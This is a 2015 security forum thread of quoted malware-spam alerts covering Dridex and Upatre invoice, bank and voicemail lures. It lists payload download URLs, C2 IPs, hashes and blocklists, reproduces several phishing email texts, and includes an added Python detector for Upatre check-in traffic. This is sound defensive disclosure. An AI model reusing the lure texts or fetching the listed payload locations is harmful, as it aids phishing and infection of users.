2 Apr 2015 - "This -fake- invoice does not come from Snap On Tools, but is instead a simple forgery.
From: Allen, Claire [Claire.Allen@ snapon .com]
Date: 24 February 2015 at 14:41
Subject: Copy invoices Snap on Tools Ltd
Good Afternoon
Attached are the copy invoices that you requested.
Regards
Claire
Your message is ready to be sent with the following file or link attachments:
SKETTDCCSMF14122514571 ...
... attachment SKETTDCCSMF14122514571.doc which contains this malicious macro... which downloads a further component from:
http ://ws6btg41m.homepage. t-online .de/025/42.exe
This executable has a detection rate of 5/57*. Various automated analyses... show attempted communications to the following IPs:
According to this Malwr report it drops another version of the downloader called edg1.exe [VT 4/57**] and a malicious Dridex DLL [VT 2/57***].
Recommended blocklist:
..."
* https://www.virustotal.com/en/file/77239513413e26259e249ab1ad8a7b47c24fa51ae12c9459eea43bb795247a31/analysis/1427978113/
** https://www.virustotal.com/en/file/ea91f19da1091ec2df6d67f4bc48c71779e1d60722169387eb556abea3b891b2/analysis/1427979096/
*** https://www.virustotal.com/en/file/edaf9629ea5d0ba91cbb5165db2f7487999d349e875047ff0527761f1e293e89/analysis/1427979103/
:fear: :mad:
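A defender-side check built from the Upatre behaviour described in the 'Tax Refund' and 'bank invoice' write-ups above: the check-in to a bare IP on a high port under a /ddmm-cc-nn/HOME/ style path, and the benign checkip.dyndns.org lookup that the Dynamoo post calls a useful indicator. This is an added example, not code from the blogs quoted in this thread; the proxy log format and the client addresses are constructed, and only the two check-in URLs quoted above are taken from the page.

```python
import re
from collections import defaultdict
from typing import Dict, List, Optional
from urllib.parse import urlsplit

# Shape of the Upatre check-in URLs quoted in the write-ups above, e.g.
#   141.105.141.87:13819/3103us13/HOME/41/7/4/
#   141.105.141.87:13840/0204uk11/HOME/0/51-SP3/0/ELHBEDIBEHGBEHK
# i.e. a tag of four digits + two letters + one or two digits, then /HOME/.
UPATRE_PATH = re.compile(r"^/\d{4}[a-z]{2}\d{1,2}/HOME/", re.IGNORECASE)
DOTTED_IP = re.compile(r"^\d{1,3}(\.\d{1,3}){3}$")

# Benign IP-lookup service the downloader uses to learn the victim's public
# address; weak on its own, but a useful corroborating signal.
IP_CHECK_HOSTS = {"checkip.dyndns.org"}


def classify_url(method: str, url: str) -> Optional[str]:
    """Tag one proxied request: 'upatre_checkin', 'ip_lookup' or None."""
    parts = urlsplit(url)
    host = parts.hostname or ""
    if host in IP_CHECK_HOSTS:
        return "ip_lookup"
    try:
        port = parts.port
    except ValueError:                    # unparsable port in the URL
        return None
    # Upatre talks to a bare IP on a high, non-standard port under the tag path
    if (method.upper() in ("GET", "POST")
            and DOTTED_IP.match(host)
            and port is not None and port > 1024
            and UPATRE_PATH.match(parts.path)):
        return "upatre_checkin"
    return None


def scan_proxy_log(lines: List[str]) -> Dict[str, List[str]]:
    """Collect indicator tags per client address.

    Log line format (constructed for this example, not a real product format):
        <timestamp> <client_ip> <method> <url> <status>
    """
    hits: Dict[str, set] = defaultdict(set)
    for line in lines:
        fields = line.split()
        if len(fields) < 5:
            continue                      # malformed line: skip, don't crash
        _ts, client, method, url, _status = fields[:5]
        tag = classify_url(method, url)
        if tag:
            hits[client].add(tag)
    return {client: sorted(tags) for client, tags in hits.items()}


def verdict(tags: List[str]) -> str:
    """Escalation level for one client from its collected tags."""
    if "upatre_checkin" in tags:
        return "likely infected"          # characteristic C2 check-in seen
    if "ip_lookup" in tags:
        return "investigate"              # only the benign lookup seen
    return "clean"


# Constructed sample log; the indicator URLs are the ones quoted above.
SAMPLE_LOG = [
    "2015-04-02T11:47:01 10.0.0.5 GET http://checkip.dyndns.org/ 200",
    "2015-04-02T11:47:03 10.0.0.5 POST http://141.105.141.87:13840/0204uk11/HOME/0/51-SP3/0/ELHBEDIBEHGBEHK 200",
    "2015-04-02T11:50:12 10.0.0.9 GET http://checkip.dyndns.org/ 200",
    "2015-04-02T11:51:00 10.0.0.12 GET http://intranet.example/HOME/index.html 200",
    "2015-04-02T11:52:30 10.0.0.12 GET http://example.org:8080/0204uk11/HOME/ 200",
    "this line is malformed",
]

if __name__ == "__main__":
    for client, tags in scan_proxy_log(SAMPLE_LOG).items():
        print(f"{client}: {tags} -> {verdict(tags)}")
```

The hostname-plus-port test keeps a same-shaped path on an ordinary web server (the example.org line) from firing, which is the false positive a path-only rule would raise.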
AplusWebMaster
2015-04-03, 15:04
FYI...
Fake 'Scanned Invoice' SPAM – doc/xls malware
- http://myonlinesecurity.co.uk/scanned-invoice-89412268-from-flybe-group-plc-word-doc-or-excel-xls-spreadsheet-malware/
3 Apr 2015 - "'Scanned Invoice [89412268] from FLYBE GROUP PLC' pretending to come from Warren Horn <Moses.3a@ tcl. net .in> with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email looks like:
Location: 1st Floor Office
File Extension: DOC (Medium)
Resolution: 300dpi x 300dpi
Attached file is scanned document in DOC format.
Warren Horn , FLYBE GROUP PLC
3 April 2015: 89412268.doc - Current Virus total detections: 0/56*
This downloads http ://75.150.62.121 :8080/bz1gs9/kansp1.jpg and then renames it to %temp%\dfsdfff.exe and runs without any further user interaction (VirusTotal**) ... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/f984b5753b1d7570dc03d8de6456ea620b2fc4426684d3e5befeaefbad5b9a83/analysis/1428054150/
** https://www.virustotal.com/en/file/e04733cbb549994674e5ebc36e925f3d4b72823ec57dc5796dac07c3df00bf68/analysis/1428057630/
... Behavioural information
___
Fake 'calcs attachments' SPAM - PDF malware
- http://myonlinesecurity.co.uk/all-american-ce-nardin-energycalcs-net-ed-wolfe-fake-pdf-malware/
3 Apr 2015 - "'All American C&E/ Nardin' pretending to come from office <office@ energycalcs .net> with a zip attachment is another one from the current bot runs... The email looks like:
Your completed calcs are attached.
The first attachment is your Manual J&S Load calcs.
The second is your Form 405-10 Energy code compliance calc.
If you have any questions, feel free to call.
Thank you so much for your business!
Ed Wolfe- Office Manager
Energycalcs.net, Inc ...
3 April 2015: Random Attachment zip name: Extracts to: iDocs.exe
Current Virus total detections: 4/56*. The attachment with this All American C&E/ Nardin email is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/f90002d5c1696bf1d3312ccb6d64e92fdccf69ccc8e45e3d29cbc4a5accd8886/analysis/1428054460/
:fear: :mad:
AplusWebMaster
2015-04-06, 15:27
FYI...
Fake Barclays SPAM – PDF malware
- http://myonlinesecurity.co.uk/barclays-important-update-read-carefully-fake-pdf-malware-3/
6 Apr 2015 - "'Barclays – Important Update, read carefully!' pretending to come from Barclays Online Bank <security-update@ Barclays. co.uk> with a zip attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/04/Barclays-Important-Update-read-carefully.png
6 April 2015: Form.zip: Extracts to: Form.scr
Current Virus total detections: 2/56*. This is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/b051c64292acb2032c5923bc8652223adfb4ce79c9fe54aff197c7a3aeeaf59e/analysis/1428321955/
... Behavioural information
TCP connections
216.146.39.70: https://www.virustotal.com/en/ip-address/216.146.39.70/information/
UDP communications
104.41.150.68: https://www.virustotal.com/en/ip-address/104.41.150.68/information/
- http://threattrack.tumblr.com/post/115679613423/barclays-important-update-spam
Apr 6, 2015
:fear: :mad:
AplusWebMaster
2015-04-07, 15:13
FYI...
Fake 'EBOLA INFO' SPAM - malicious attachment
- http://blog.dynamoo.com/2015/04/malware-spam-ebola-information.html
7 Apr 2015 - "This fake medical email contains a malicious attachment...
From: noreply@ ggc-ooh .net
Reply-To: noreply@ ggc-ooh .net
Date: 7 April 2015 at 08:58
Subject: EBOLA INFORMATION
This email is generated from an unmanned mailbox. Dr N J Gaw can be contacted via noreply@ ggc-ooh .net
PLEASE SEE THE ATTACHED CORRESPONDENCE FOR YOUR INFORMATION.
THANK YOU.
Attached is a file 30.03.15 Ebola Virus (2).doc which contains this malicious macro... which contains a lot of girls' names as variables ... When decoded the macro downloads a component from:
http ://deosiibude .de/deosiibude.de/220/68.exe
VirusTotal submissions seem to be down at the moment, so I can't tell you what the detection rate is. Automated analysis tools... show it phoning home to the following IPs...:
According to the Malwr report it drops a whole load of files including what is probably a Dridex DLL.
Recommended blocklist:
..."
___
Fake 'Invoice Maid of London' SPAM – doc/xls malware
- http://myonlinesecurity.co.uk/march-2015-invoice-maid-of-london-word-doc-or-excel-xls-spreadsheet-malware/
7 Apr 2015 - "'March 2015 Invoice' pretending to come from Accounts @ Maid of London <accounts@ maidoflondon .co.uk> with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/04/Maid-of-London.png
7 April 2015 : March invoice 811.doc - Current Virus total detections: 0/56*
The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/6363da6f3e2b128c55a56232de7170e458b050b529f13779fb7b4d0530d36e52/analysis/1428403055/
___
Fake 'legal claim' SPAM - malicious attachment
- http://blog.dynamoo.com/2015/04/malware-spam-company-name-has-issued.html
7 Apr 2015 - "This fake legal spam comes with a malicious attachment:
From: Isiah Mosley [Rosella.e6@ customer .7starnet .com]
Date: 7 April 2015 at 14:09
Subject: Schroders has issued the claim against you and passed for consideration to HM Courts [VM1993LVW]
Schroders,Isiah Mosley
The company name is randomly chosen. In the above example the attachment was called VM1993LVW.doc which matched the reference in the subject. The Word document contains a malicious macro... Along with an alternate macro, I can see download locations from:
http ://185.39.149.178 /aszxmy/image04.gif
http ://148.251.87.253 /aszxmy/image04.gif
For the record, 185.39.149.178 is OOO A.S.R. in Russia and 148.251.87.253 is Hetzner in Germany. The downloaded .GIF file is definitely not a GIF and is instead an executable that gets saved as %TEMP%\dfsdfff.exe. This has a VirusTotal detection rate of 2/56*. Automated analysis tools... show the malware phoning home to:
151.252.48.36 (Vautron Serverhousing, Germany)
According to the Malwr report, it drops a DLL with a detection rate of 2/56* which is most likely a Dridex DLL.
Recommended blocklist:
151.252.48.36
148.251.87.253
185.39.149.178
MD5s:
a4e14c88da9e1a74cd7c26ded99b6a0a
c86a9d012e372d0c3a82b14978ffa1f0"
* https://www.virustotal.com/en/file/5a3aba781908dbaa7a0e75f144d4c240ea61641782855b918b7258f2279a0281/analysis/
___
Fake 'Chase Card Services' SPAM – malware
- http://myonlinesecurity.co.uk/chase-card-services-thank-you-for-scheduling-your-online-payment-malware/
7 Apr 2015 - "'Thank you for scheduling your online payment' pretending to come from Chase Card Services <no-reply@ alertsp .chase .com> with a zip attachment is another one from the current bot runs...
Dear Thank you for scheduling your recent credit card payment as an attachment. Your payment in the amount of 3898.96 will be credited to your credit card account (CREDIT CARD) ending in 2143 on 04/07/2015.
Now that you’re making your payment online, are you aware of all the convenient ways you can manage your account online?
See statements – Choose to stop receiving paper statements, and see up to six years of your statements online.
See automatic payments – Set up monthly payments to be made automatically.
Transfer a balance – Transfer a balance to your credit card account.
Go to Personalized Alerts – Schedule Alerts to remind you of key account activity.
You can also see past payments you’ve made online by logging on to www.chase.com/creditcards and clicking “See/cancel payments” under “I’d like to …”
If you have questions, please call the Customer Service number on the back of your credit card.
Thanks again for using online payments.
Sincerely,
Cardmember Services ...
7 April 2015: payment-2143-wiqr_BSFMN.zip: Extracts to: payment.exe
Current Virus total detections: 7/56* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF or image file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/dda530220c7196a25fe5119dae77006879ce67974fe520512ecf103841ed0bed/analysis/1428417618/
... Behavioural information
TCP connections
91.198.22.70: https://www.virustotal.com/en/ip-address/91.198.22.70/information/
141.105.141.87: https://www.virustotal.com/en/ip-address/141.105.141.87/information/
162.252.57.88: https://www.virustotal.com/en/ip-address/162.252.57.88/information/
UDP communications
23.101.187.68: https://www.virustotal.com/en/ip-address/23.101.187.68/information/
:fear::fear: :mad:
AplusWebMaster
2015-04-08, 11:39
FYI...
- http://krebsonsecurity.com/2015/04/fbi-warns-of-fake-govt-sites-isis-defacements/
Apr 7, 2015
Fake Government Websites ...
- https://www.us-cert.gov/ncas/current-activity/2015/04/07/IC3-Issues-Alert-Fake-Government-Websites
Apr 7, 2015 - "The Internet Crime Complaint Center (IC3) has released an alert that warns consumers of fraudulent government-services websites that mimic legitimate ones. Scam operators lure consumers to these -fraudulent- websites in order to steal their personal identifiable information (PII) and collect fees for services that are never delivered. US-CERT encourages users to review the IC3 Alert* for details and refer to the US-CERT Tip ST04-014** for information on social engineering and phishing attacks."
* http://www.ic3.gov/media/2015/150407-2.aspx
Apr 7, 2015
** https://www.us-cert.gov/ncas/tips/ST04-014
Apr 7, 2015
___
Web Site Defacements ...
- https://www.us-cert.gov/ncas/current-activity/2015/04/07/IC3-Releases-Alert-Web-Site-Defacements
Apr 7, 2015 - "The Internet Crime Complaint Center (IC3) has issued an alert addressing recently perpetrated Web site defacements. The defacements advertise themselves as associated with the Islamic State in the Levant (ISIL) a.k.a. Islamic State of Iraq and al-Shams (ISIS). However, FBI assesses that the perpetrators are -not- actually associated with this group. The perpetrators exploit WordPress content management system (CMS) vulnerabilities, leading to disruptive and costly effects. Users and administrators are encouraged to review the IC3 Alert* for details and refer to the US-CERT Alert TA13-024A** for information on CMS security."
* http://www.ic3.gov/media/2015/150407-1.aspx
Apr 7, 2015
** http://www.us-cert.gov/ncas/alerts/TA13-024A
Apr 7, 2015
___
Fake 'UNPAID INVOICES' SPAM - malicious attachment
- http://blog.dynamoo.com/2015/04/malware-spam-two-unpaid-invoices-wayne.html
8 Apr 2015 - "This -fake- invoice spam is not from Orion Plastics but is instead a simple forgery with a malicious attachment.
From: Wayne Moore [wayne44118@ orionplastics .net]
Date: 8 April 2015 at 09:03
Subject: TWO UNPAID INVOICES
4/3----- LAST WEEK I CALLED REGARDS TWO UNPAID INVOICES FROM JAN 2015
INVOICE # 029911 DATED 1/7/15 FOR $840.80
INVOICE # 030042 DATED 1/30/15 FOR $937.00
PLEASE ADVISE WHEN YOU SENT CHECK AND TO WHAT ADDRESS
I HAVE ATTACHED THE NEW REMIT TO ADDRESS IN CASE YOU DON’T HAVE IT
REGARDS-WAYNE
In this case the email was -malformed- and the attachment REMITTANCE & WIRE TRANSFER ADDRESS.DOC wasn't downloadable (this may be a temporary problem). The document has a detection rate of just 1/56*. Extracting the document revealed this malicious macro... which downloads an additional component from:
http ://fzsv .de/11/004.exe
There are usually other download locations in different variants of the document, but the downloaded executable will be the same. The executable is saved as %TEMP%\c48.exe. This malicious binary has a detection rate of 6/54**. Automated analysis tools... show it phoning home to the following IPs:
37.140.199.100 (Reg.Ru Hosting, Russia)
176.67.160.187 (UK2, UK)
81.148.134.130 (BT, UK)
46.228.193.201 (Aqua Networks Ltd, Germany)
83.136.80.46 (myLoc, Germany)
The Malwr report shows it attempting to connect to a couple of Akamai IPs that I suspect are NOT malicious and would cause collateral damage if blocked:
90.84.136.185
184.25.56.220
According to the same Malwr report it drops a Dridex DLL with a detection rate of 4/57**.
Recommended blocklist:
37.140.199.100
176.67.160.187
81.148.134.130
46.228.193.201
83.136.80.46
MD5s:
3e3a09644170ad3184facb4cace14f8a
671c65cedc8642adf70ada3f74d5da19
14c2795bcc35c3180649494ec2bc7877 "
* https://www.virustotal.com/en/file/e2c4163b16258ea8719d39be8ac30b9020fcfb6616f70fefcc4471b6318d0ce4/analysis/1428485931/
** https://www.virustotal.com/en/file/434fe2d5b2b26d3b14d2959567822f9b08730144d7e9ceb234db1f477e2faf2d/analysis/1428485937/
___
Fake 'BACS Transfer' SPAM – PDF malware
- http://myonlinesecurity.co.uk/bacs-transfer-remittance-for-jsag783gbp-fake-pdf-malware/
8 Apr 2015 - "'BACS Transfer : Remittance for JSAG783GBP' pretending to come from random names and email addresses at natwest .com with a zip attachment is another one from the current bot runs... The email which has random amounts looks like:
We have arranged a BACS transfer to your bank for the following amount : 4278.00
Please find details attached.
8 April 2015: BACS_Transfer_AQ004719.zip : Extracts to: BACS_Transfer_AQ004719.scr
Current Virus total detections: 3/57* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/036daf4501d0f9c76ebf75c709fcd647eab5436bc3028ceb8ffd431110e2616a/analysis/1428491113/
... Behavioural information
TCP connections
216.146.43.70: https://www.virustotal.com/en/ip-address/216.146.43.70/information/
141.105.141.87: https://www.virustotal.com/en/ip-address/141.105.141.87/information/
66.7.216.61: https://www.virustotal.com/en/ip-address/66.7.216.61/information/
UDP communications
23.101.187.68: https://www.virustotal.com/en/ip-address/23.101.187.68/information/
___
Fake 'Password Re-activation' SPAM - PDF malware
- http://myonlinesecurity.co.uk/bankline-roi-password-re-activation-form-fake-pdf-malware/
8 Apr 2015 - "'Bankline ROI – Password Re-activation Form' pretending to come from various names and email addresses @rbs .co .uk with a zip attachment is another one from the current bot runs... The email looks like:
Please find the Re-activation form attached, send one per user ensuring only one box is selected in section 3. A signatory on the bank mandate must sign the form.
Fax to 1850 262125 or alternatively you may wish to email the completed document, by attaching it to an email and sending it to banklineadministration@ rbs .co .uk
On receipt of the completed form we will respond to the request within 2 working hours and communicate this to the user by email.
<<Bankline_Password_reset_3978322.pdf>>
Please note – The life-span of an activation code is 21 days; after this time, the activation code will expire and a new one must be ordered.
Please be aware when choosing a new pin and password for the service, it is important not to use pin/passwords that you have used before but to use completely different details.
If you are the sole Standard Administrator may I take this opportunity to suggest when you are reinstated on the system, to set up another User in a Standard Administrator role. This will prevent you being locked out completely and allow you to order a new activation code from within the system and reset your security sooner.
If you require any further assistance then please do not hesitate to contact us on 1850 245140 and one of our associates will be happy to assist you.
Regards
Bankline Product Support ...
Same malware payload, although -renamed- as Bankline_Password_reset_0319234.zip (random numbers) as today’s NatWest attempt BACS Transfer : Remittance for JSAG783GBP – fake PDF malware* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* http://myonlinesecurity.co.uk/bacs-transfer-remittance-for-jsag783gbp-fake-pdf-malware/
___
Fake 'Invoice' SPAM - malicious doc/xls
- http://blog.dynamoo.com/2015/04/malware-spam-invoice-from-company-name.html
8 Apr 2015 - "This -Dridex- spam takes a slightly different approach from other recent ones. Instead of -attaching- a malicious Office document, it downloads it from a compromised server instead. The example I saw read:
From: Mitchel Levy
Date: 8 April 2015 at 13:45
Subject: Invoice from MOTHERCARE
Your latest invoice is now available for download. We kindly advise you to pay the invoice in time.
Download your invoice here.
Thanks for attention. We appreciate your business.
If you have any queries, please do not hesitate to contact us.
Mitchel Levy, MOTHERCARE
The link in the email has an address using the domain afinanceei .com plus a subdomain based on the recipient's email address. It also has the recipient's email address embedded in the URL, for example: http ://victimbfe .afinanceei .com/victim@ victim .domain/
This is hosted on 31.24.30.12 (Granat Studio / Tomgate LLC, Russia) and it leads to a landing page that looks like this:
> https://4.bp.blogspot.com/-vUPtkxCCOGs/VSUoF2z9iSI/AAAAAAAAGeI/y_3wZi6iXMo/s1600/dridex-landing.png
... The link in the email downloads a file from:
http ://31.24.30.12 /api/Invoice.xls
At the moment the download server seems very unstable and is generating a lot of 500 errors. Incidentally, http ://31.24.30.12 /api/ shows a -fake- page pretending to be from Australian retailer Kogan:
> https://4.bp.blogspot.com/-Lp2QSnPComc/VSUsA5UN8PI/AAAAAAAAGeU/Hf7-6GPdBQo/s1600/fake-kogan.png
As you might guess, Invoice.xls contains a malicious macro... but the real action is some data hidden in the spreadsheet itself... it instructs the computer to download a malicious binary from:
http ://46.30.43.102 /cves/kase.jpg
This is saved as %TEMP%\dfsdfff.exe. Unsurprisingly, 46.30.43.102 is another Russian IP, this time EuroByte LLC. This binary has a VirusTotal detection rate of 6/57*. Automated analysis tools... show it communicating with the following IPs:
In addition there are some Akamai IPs which look benign...
184.25.56.212
184.25.56.205
2.22.234.90
According to this Malwr report it drops several files including a malicious Dridex DLL which is the same one found in this attack:
> http://blog.dynamoo.com/2015/04/malware-spam-two-unpaid-invoices-wayne.html
Recommended blocklist:
MD5s:
e8cd8be37e30c9ad869136534f358fc5
671c65cedc8642adf70ada3f74d5da19
a4af11437798b7de5a0884623ed42478 "
* https://www.virustotal.com/en/file/b1e7e4d11ded1c5c14c5f28fcbf2750e5492f9ce5bd5de461b026ff6d63d0b5c/analysis/1428499086/
:fear::fear: :mad:
AplusWebMaster
2015-04-09, 13:07
FYI...
Fake 'Credit card transaction' SPAM - doc/xls malware
- http://myonlinesecurity.co.uk/credit-card-transaction-royal-wholesale-electric-word-doc-or-excel-xls-spreadsheet-malware/
9 Apr 2015 - "'Credit card transaction' pretending to come from Matthews, Tina <tina@ royalcarson .com> with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/04/Credit-card-transaction.png
9 April 2015: 20150326094147512.doc - Current Virus total detections: 0/56*
The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/52739a3668ff000d77093989c0f7f91b20de43926df7d90c254d7fb57cfbfdf7/analysis/1428569272/
- http://blog.dynamoo.com/2015/04/malware-spam-matthews-tina.html
9 Apr 2015
"...Tina Matthews
... Recommended blocklist: ..."
___
Fake 'sorry you had a problem' SPAM – malware
- http://myonlinesecurity.co.uk/were-sorry-you-had-a-problem-with-your-purchase-malware/
9 Apr 2015 - "'We’re sorry you had a problem with your purchase' coming from random email addresses with a zip attachment is another one from the current bot runs... There are lots of different subjects with this malware spam run today. They include:
we’re issuing you a refund
a full refund
We’re sorry you had a problem with your purchase
The refund include original shipping
a payment reminder
RE: direct debit payment
direct debit payment
invoice
NEW Payment reminder ...
The email looks like:
'We issued you a full refund of 161.18 on Apr 09, 2015 The refund includes the purchase price plus original shipping.
Decision:
This case has been decided in your favor.
We’re sorry you had a problem with your purchase, and we’re issuing you a refund for this case.'
-Or-
'Hello, Payment Reminder: your invoice 62169289 dated 07.04.2015 in the amount 573.96'
All the emails have different amounts and various dates. The attachment names vary. So far I have seen refund_shipping_DOC.xml.exe and invoice.92004711.2015.04.08.doc.exe ...
9 April 2015: refund_shipping_DOC.xml.zip: Extracts to: refund_shipping_DOC.xml.exe
Current Virus total detections: 1/57* - This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/0942c34910e5fd1fd24fbae079a5f86796be5e65ccbd3673bde08140ab6571e6/analysis/1428567172/
... Behavioural information
UDP communications
23.101.187.68: https://www.virustotal.com/en/ip-address/23.101.187.68/information/
___
Fake 'Trade Confirmation' SPAM – PDF malware
- http://myonlinesecurity.co.uk/your-trade-confirmations-are-available-fake-pdf-malware/
9 Apr 2015 - "'Your Trade Confirmation(s) are Available' pretending to come from noreply@ masteryconnect .com with a zip attachment is another one from the current bot runs... The email looks like:
Please review the attached RFI, Submittal cheatsheet – this update reflects latest changes from RVA.
9 April 2015 : view kklvyg.zip: Extracts to: view.exe
Current Virus total detections: 2/56* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/e064af96c07f2e5bfe726e24285df34e9c3400e1a52f00a9fd6f81cfec422012/analysis/1428583433/
... Behavioural information
UDP communications
23.102.23.44: https://www.virustotal.com/en/ip-address/23.102.23.44/information/
___
Fake 'Mail Out Report' SPAM – PDF malware
- http://myonlinesecurity.co.uk/mail-out-report-attached-fake-pdf-malware/
9 Apr 2015 - "'Mail Out Report Attached' pretending to come from Alert ARC Reports <zen179397@ zen .co .uk> with a zip attachment is another one from the current bot runs... The email looks like:
From Securitas, please do not reply to this e-mail as it is auto generated.
For any problems please e-mail derry.andrews@ securitas .co .uk
9 April 2015: Q100219366_Mail Out Report.zip: Extracts to: Q100219366_Mail Out Report.exe
Current Virus total detections: 1/57* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/045317ab6b4f1559fd485c7d189f791703a03c60744235af4af67ad3a6fe37eb/analysis/1428580032/
... Behavioural information
TCP connections
216.146.38.70: https://www.virustotal.com/en/ip-address/216.146.38.70/information/
141.105.141.87: https://www.virustotal.com/en/ip-address/141.105.141.87/information/
208.91.198.171: https://www.virustotal.com/en/ip-address/208.91.198.171/information/
UDP communications
23.101.187.68: https://www.virustotal.com/en/ip-address/23.101.187.68/information/
___
Fake 'Voicemail' SPAM – wav malware
- http://myonlinesecurity.co.uk/voipfone-voicemail-new-message-in-mailbox-301200-fake-wav-malware/
9 Apr 2015 - "'New message in mailbox 301***200' pretending to come from Voipfone Voicemail <voicemail@ voipfone .co .uk> with a zip attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/04/New-message-in-mailbox..png
9 April 2015: msg0005.wav.zip : Extracts to: msg0005.wav.exe
Current Virus total detections: 2/47* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper wav ( voice) file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/8ad0b4f3e284974fb3f8c511a37c7728d958924d2e8a405561532dfd95cf3186/analysis/1428582133/
... Behavioural information
UDP communications
23.99.222.162: https://www.virustotal.com/en/ip-address/23.99.222.162/information/
___
Fake 'incoming wire' – PDF malware
- http://myonlinesecurity.co.uk/metro-bank-unknown-incoming-wire-fake-pdf-malware/
9 Apr 2015 - "'Unknown incoming wire' pretending to come from random names @metrobankonline .co.uk with a zip attachment is another one from the current bot runs... The email looks like:
The banking activity with today’s posting date shows Electronic Fund Transfer (EFT) that has been received. Our bank has noted the following information:
EFT Amount: 60,200.00 GBP
Remitted From: SSA TREAS 310 MISC PAY
Designated for: UNKNOWN
Please download and open attachment with full imformation about this Electronic Fund Transfer payment.
If you confirm that it belongs to your agency or department, please email back or give us a call. Then, our office needs to receive a completed General Deposit no later than 10:00 a.m. tomorrow.
Note: If these funds cannot be identified or if no one claims this EFT, we are required to process the return of this EFT by 10:00, April 09, 2015.
Thank you...
9 April 2015: electronic_fund_transfer.zip: Extracts to: electronic_fund_transfer.exe
Current Virus total detections: 3/57* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/89f328f73c4706174bfe3b2f0ba7b92fc1aa08042aeb5a5e3c81961924ad901e/analysis/1428584776/
... Behavioural information
TCP connections
216.146.43.70: https://www.virustotal.com/en/ip-address/216.146.43.70/information/
141.105.141.87: https://www.virustotal.com/en/ip-address/141.105.141.87/information/
149.255.58.7: https://www.virustotal.com/en/ip-address/149.255.58.7/information/
UDP communications
23.102.23.44: https://www.virustotal.com/en/ip-address/23.102.23.44/information/
___
Fake 'disneyinteractive' SPAM - PDF malware
- http://myonlinesecurity.co.uk/disneyinteractive-com-yearly-report-fake-pdf-malware/
9 Apr 2015 - "'yearly Report' pretending to come from apps@ e.disneyinteractive .com with a zip attachment is another one from the current bot runs... The email looks like:
Annual Report as an attachment
9 April 2015: Annual #Thu, 09 Apr 2015 18_14_02 +0100.cab: Extracts to: Report.exe
Current Virus total detections: 7/57* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/01a04e13d78822334b4fc91b1588a82175bf4b6c250691bb306012aa308fa0d3/analysis/1428598594/
... Behavioural information
TCP connections
216.146.43.70: https://www.virustotal.com/en/ip-address/216.146.43.70/information/
141.105.141.87: https://www.virustotal.com/en/ip-address/141.105.141.87/information/
104.156.59.86: https://www.virustotal.com/en/ip-address/104.156.59.86/information/
___
Namailu .com SPAM
- http://blog.dynamoo.com/2015/04/namailucom-spam.html
9 Apr 2015 - "This -spam- has been appearing in my inbox for several days now:
From: Shana Felton [9k7bf-2976014268@serv .craigslist .org]
Date: 9 April 2015 at 19:10
Subject: New commitment invitation - [redacted]
Sarah Smith
Hi Namailu User,
You have a commitment invitation from Sarah Smith. To view your commitment invitation please follow this link:
View Invitation
Copyright © 2015, Namailu Online Ltd...
Clicking through the link leads to https ://www .namailu .com/Smith.Sarah.206
> https://4.bp.blogspot.com/-fuQur_gywwY/VSbdwNDQS0I/AAAAAAAAGfk/us8dr9DE2xY/s1600/namailu1.jpg
Obviously we are led to believe that the girl in the picture is sending the message:
> https://3.bp.blogspot.com/-5e-oLshpuVQ/VSbeVCMWa1I/AAAAAAAAGfs/HNhF1UkHGJo/s1600/1425448322.png.jpg
Reverse image search comes up with no matches, unusually. Goodness knows how many people there are called "Sarah Smith" in New Zealand. Probably quite a lot. The spam messages come from a range of IPs that are also used to spam out promotional material for a site called dirtyemojis .com (using a redirector of dirtyemojis .ru). The spam is sent from a range of Chinese IP addresses... In each case the "From" address is -fake- ... A quick search of the body text of the message shows that it has been spammed out quite widely... this clueless approach does -not- bode well for a site that deals in highly personal data and my personal opinion would be to give this particular outfit a very wide berth."
___
Fake 'eFax'message SPAM - PDF malware
- http://myonlinesecurity.co.uk/efax-message-from-anna-2-pages-caller-id-1-920-530-9136-fake-pdf-malware/
